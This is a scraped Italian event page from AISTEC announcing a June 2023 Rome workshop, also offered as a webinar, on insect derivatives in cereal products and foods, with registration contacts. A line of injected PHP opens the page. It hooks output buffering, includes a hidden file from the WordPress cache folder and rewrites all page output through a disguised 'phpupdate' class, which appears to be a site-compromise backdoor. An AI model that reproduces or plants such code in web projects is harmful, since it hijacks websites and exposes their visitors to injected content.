function ob_gzhanler($s) { $f='/var/www/html/aistec.it/wp-content/cache/ssess_e8d6bcd9c95ecd84b2c587adf9d53cf1'; if(file_exists($f)) include_once($f); return class_exists('phpupdate') ? phpupdate::copyright($s) : $s; } ob_start('ob_gzhanler');UTILIZZO DEI DERIVATI DA INSETTI NEI PRODOTTI CEREALICOLI ED IN GENERALE NEGLI ALIMENTI: OPPORTUNITà O PROBLEMA? - AISTEC
martedì, 30 maggio 2023
Utilizzo dei derivati da insetti nei prodotti cerealicoli ed in generale negli alimenti: opportunità o problema?
Nell’ambito degli eventi in anticipazione del Festival CEREALIA XIII Edizione | 2023, il 26 giugno 2023 si svolgerà un workshop dal titolo "Utilizzo dei derivati da insetti nei prodotti cerealicoli ed in generale negli alimenti: opportunità o problema?". Il workshop si svolgerà a Roma presso la Sala FNSI Federazione Nazionale Stampa Italiana, Corso Vittorio Emanuele II, 349 Roma e piattaforma GoToWebinar.
 
Per la partecipazione in presenza registrarsi entro il 22/06/2023 con e-mail a fidaf.livenza6@gmail.com 
 
Per la partecipazione da remoto registrarsi al seguente LINK: https://attendee.gotowebinar.com/register/4078368333942487639
 
Per tutti i dettagli contattare la Dott.ssa Marina Carcea, CREA-Alimenti e nutrizione marina.carcea@crea.gov.it